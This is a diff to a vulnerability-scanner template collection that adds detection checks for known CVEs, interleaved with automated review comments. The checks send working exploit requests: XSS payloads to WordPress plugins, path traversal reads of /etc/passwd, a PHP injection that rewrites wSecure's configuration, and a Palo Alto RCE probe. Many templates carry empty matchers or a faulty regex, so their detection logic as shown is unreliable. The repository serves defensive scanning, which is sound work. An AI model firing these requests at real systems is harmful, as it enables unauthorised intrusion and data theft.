diff --git a/README.md b/README.md index b2ebc20708..b6fb139ccd 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 430 | vulnerabilities | 233 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 120 | +| cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | +| takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 37 | file | 42 | dns | 10 | +| default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1551 files**. +**134 directories, 1596 files**. diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml new file mode 100644 index 0000000000..f56848b401 --- /dev/null +++ b/cves/2009/CVE-2009-1558.yaml @@ -0,0 +1,24 @@ +id: CVE-2009-1558 + +info: + name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. + reference: https://www.exploit-db.com/exploits/32954 + tags: cve,cve2009,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml new file mode 100644 index 0000000000..25c8832501 --- /dev/null 
+++ b/cves/2012/CVE-2012-1835.yaml
@@ -0,0 +1,34 @@
+id: CVE-2012-1835
+
+info:
+ name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835
+ tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
+# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml
new file mode 100644
index 0000000000..d6883d7e82
--- /dev/null
+++ b/cves/2013/CVE-2013-3827.yaml
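Review bot: As rendered here the body matcher's only word in CVE-2012-1835 is `""`, and a `type: word` matcher with an empty word matches every response, so together with the `text/html` header and status-200 matchers the template would flag any site that serves that plugin path; the word should be the exact string the page reflects back (if the page extraction merely stripped an HTML-tag string from this listing, disregard). The same `- ""` body word appears in every other reflected-XSS template in this commit (CVE-2016-1000128 through CVE-2016-1000135, CVE-2017-17043, CVE-2017-17059, CVE-2017-17451, CVE-2017-18536, CVE-2017-9288, CVE-2018-11709, CVE-2018-20462, CVE-2018-5316, CVE-2019-15713, CVE-2019-16332, CVE-2019-16525). The four commented-out `path` entries are dead configuration: either drop them, or enable them with `stop-at-first-match: true` so the other sinks the description lists are actually checked.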
@@ -0,0 +1,38 @@
+id: CVE-2013-3827
+
+info:
+ name: Javafaces LFI
+ author: Random-Robbie
+ severity: medium
+ description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
+ tags: cve,cve2013,lfi,javafaces,oracle
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-3827
+ - https://www.exploit-db.com/exploits/38802
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+ - "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+ - "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+ - "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+ - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml
new file mode 100644
index 0000000000..83fc34ed8d
--- /dev/null
+++ b/cves/2016/CVE-2016-1000128.yaml
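Review bot: In CVE-2013-3827 `reference: |` stores the two URLs as one multi-line string whose text merely looks like a list, so anything that reads `reference` as a sequence (nuclei's schema accepts a list there) sees a single value beginning with `- `; write it as a YAML sequence, `reference:` followed by `  - https://nvd.nist.gov/vuln/detail/CVE-2013-3827` and `  - https://www.exploit-db.com/exploits/38802`. The same block-scalar form is used in CVE-2016-10960, CVE-2017-15944, CVE-2017-17059, CVE-2018-12031, CVE-2019-12616, CVE-2019-15713, CVE-2019-20085, CVE-2020-25506, CVE-2020-26919 and CVE-2021-31755. The body matcher's `condition: and` is a no-op with a single word, and the file is added without a trailing newline (`\ No newline at end of file`). The name `Javafaces LFI` is terser than the `Product version - Vulnerability class` form the other new templates follow; something like `Oracle GlassFish/JSF - Directory Traversal (web.xml)` would read consistently.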
@@ -0,0 +1,29 @@
+id: CVE-2016-1000128
+
+info:
+ name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml
new file mode 100644
index 0000000000..d76c910dcf
--- /dev/null
+++ b/cves/2016/CVE-2016-1000129.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000129
+
+info:
+ name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml
new file mode 100644
index 0000000000..36392e35d4
--- /dev/null
+++ b/cves/2016/CVE-2016-1000130.yaml
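Review bot: The `info` block of CVE-2016-1000128 has no `description`, unlike the sibling templates added in this commit, so a reader gets no statement of what is tested beyond the name; add one in the same form the others use, e.g. `  description: Reflected XSS in wordpress plugin anti-plagiarism v3.60`. CVE-2016-1000131 in this commit has the same gap.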
@@ -0,0 +1,30 @@
+id: CVE-2016-1000130
+
+info:
+ name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin e-search v1.0
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml
new file mode 100644
index 0000000000..1e540169b2
--- /dev/null
+++ b/cves/2016/CVE-2016-1000131.yaml
@@ -0,0 +1,29 @@
+id: CVE-2016-1000131
+
+info:
+ name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml
new file mode 100644
index 0000000000..e72ea63c7b
--- /dev/null
+++ b/cves/2016/CVE-2016-1000132.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000132
+
+info:
+ name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&msg=imported"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml
new file mode 100644
index 0000000000..658b8562e7
--- /dev/null
+++ b/cves/2016/CVE-2016-1000133.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000133
+
+info:
+ name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%22%20%3C%2Fscript%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml
new file mode 100644
index 0000000000..1f35214f3d
--- /dev/null
+++ b/cves/2016/CVE-2016-1000134.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000134
+
+info:
+ name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin hdw-tube v1.2
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml
new file mode 100644
index 0000000000..ba16e3c957
--- /dev/null
+++ b/cves/2016/CVE-2016-1000135.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000135
+
+info:
+ name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin hdw-tube v1.2
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml
new file mode 100644
index 0000000000..68f7e2616c
--- /dev/null
+++ b/cves/2016/CVE-2016-10960.yaml
@@ -0,0 +1,29 @@
+id: CVE-2016-10960
+
+info:
+ name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
+ author: daffainfo
+ severity: critical
+ description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
+ reference: |
+ - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
+ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
+ tags: cve,cve2016,wordpress,wp-plugin,rce
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
+ body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Nuclei: CVE-2016-10960"
+ condition: and
+ part: header
+ - type: status
+ status:
+ - 200
diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml
index 45e7bfda4b..2d6bd7fbd0 100644
--- a/cves/2017/CVE-2017-15944.yaml
+++ b/cves/2017/CVE-2017-15944.yaml
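Review bot: The CVE-2016-10960 POST body sends `wsecure_action=update` with a crafted `publish` value, so on a vulnerable site the request rewrites the plugin's stored configuration rather than only reading a response, and nothing in `info` tells an operator that the check is state-changing; add a line such as `  # NOTE: this request persists a modified wsecure configuration on the target` above `requests`, or say so in `description`, so the template can be excluded where intrusive checks are not permitted. The `condition: and` on the header matcher is a no-op with a single word. The `Nuclei: CVE-2016-10960` response-header marker with `part: header` is a sensible benign indicator and needs no change.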
@@ -2,23 +2,27 @@ id: CVE-2017-15944 info: name: PreAuth RCE on Palo Alto GlobalProtect - author: emadshanab - reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html + author: emadshanab,milo2012 + reference: | + - https://www.exploit-db.com/exploits/43342 + - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html severity: high - tags: cve,cve2017,rce,vpn,paloalto + tags: cve,cve2017,rce,vpn,paloalto,globalprotect requests: - - method: GET - path: - - "{{BaseURL}}/global-protect/portal/css/login.css" + - raw: + - | + GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID={{randstr}}; matchers-condition: and matchers: - type: word words: - - "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT" - part: header + - "@start@Success@end@" + part: body - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml new file mode 100644 index 0000000000..3d321b4c8f --- /dev/null +++ b/cves/2017/CVE-2017-17043.yaml @@ -0,0 +1,30 @@ +id: CVE-2017-17043 + +info: + name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 
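Review bot: In CVE-2017-15944 the rewritten `- 200` line is now the last line of the file and carries `\ No newline at end of file`, so the commit drops the trailing newline the old file had; add it back. The new raw request also turns the template from a passive fingerprint (the old `Last-Modified` header check) into one that sends what appears to be an exploitation payload in the `device=` parameter, and `info` should say so that operators can exclude it where intrusive checks are not allowed. The `Cookie: PHPSESSID={{randstr}};` header ends with a stray `;`, harmless but untidy.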
diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml
new file mode 100644
index 0000000000..ecf71fafc7
--- /dev/null
+++ b/cves/2017/CVE-2017-17059.yaml
@@ -0,0 +1,34 @@
+id: CVE-2017-17059
+
+info:
+ name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
+ reference: |
+ - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
+
+ body: "amty_hidden=1"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml
new file mode 100644
index 0000000000..40a4e59745
--- /dev/null
+++ b/cves/2017/CVE-2017-17451.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-17451
+
+info:
+ name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml
new file mode 100644
index 0000000000..5ac65f849b
--- /dev/null
+++ b/cves/2017/CVE-2017-18536.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-18536
+
+info:
+ name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
+ reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml
new file mode 100644
index 0000000000..19bdc03839
--- /dev/null
+++ b/cves/2017/CVE-2017-9288.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-9288
+
+info:
+ name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml
new file mode 100644
index 0000000000..4f305a6330
--- /dev/null
+++ b/cves/2018/CVE-2018-11709.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-11709
+
+info:
+ name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml
new file mode 100644
index 0000000000..0fc4b182f1
--- /dev/null
+++ b/cves/2018/CVE-2018-12031.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-12031
+
+info:
+ name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
+ reference: |
+ - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-12031
+ - https://www.exploit-db.com/exploits/48614
+ tags: cve,cve2018,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[0*]:0:0"
+ - "\\[(font|extension|file)s\\]"
+ condition: or
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml
new file mode 100644
index 0000000000..79a0cbd39f
--- /dev/null
+++ b/cves/2018/CVE-2018-20462.yaml
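Review bot: In CVE-2018-12031 the `/etc/passwd` regex `root:[0*]:0:0` only matches when the password field is `0` or `*`, so the usual `root:x:0:0` line is missed and the Linux path of the check never matches; use the same class CVE-2009-1558 in this commit uses, `- "root:[x*]:0:0"`. The `condition: or` with `part: body` is right for a two-platform check, and the Windows `\\[(font|extension|file)s\\]` pattern is fine.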
@@ -0,0 +1,30 @@
+id: CVE-2018-20462
+
+info:
+ name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2018/CVE-2018-5316.yaml b/cves/2018/CVE-2018-5316.yaml
new file mode 100644
index 0000000000..7553a25625
--- /dev/null
+++ b/cves/2018/CVE-2018-5316.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-5316
+
+info:
+ name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml
new file mode 100644
index 0000000000..093014e337
--- /dev/null
+++ b/cves/2019/CVE-2019-12616.yaml
@@ -0,0 +1,29 @@
+id: CVE-2019-12616
+
+info:
+ name: phpMyAdmin CSRF
+ author: Mohammedsaneem
+ description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken  tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
+ severity: medium
+ tags: cve,cve2019,phpmyadmin,csrf
+ reference: |
+ - https://www.phpmyadmin.net/security/PMASA-2019-4/
+ - https://www.exploit-db.com/exploits/46982
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-12616
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/phpmyadmin/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "4.6.6deb4+deb9u2"
+ - "phpMyAdmin"
+ condition: and
+
+ - type: status
+ status:
+ - 200
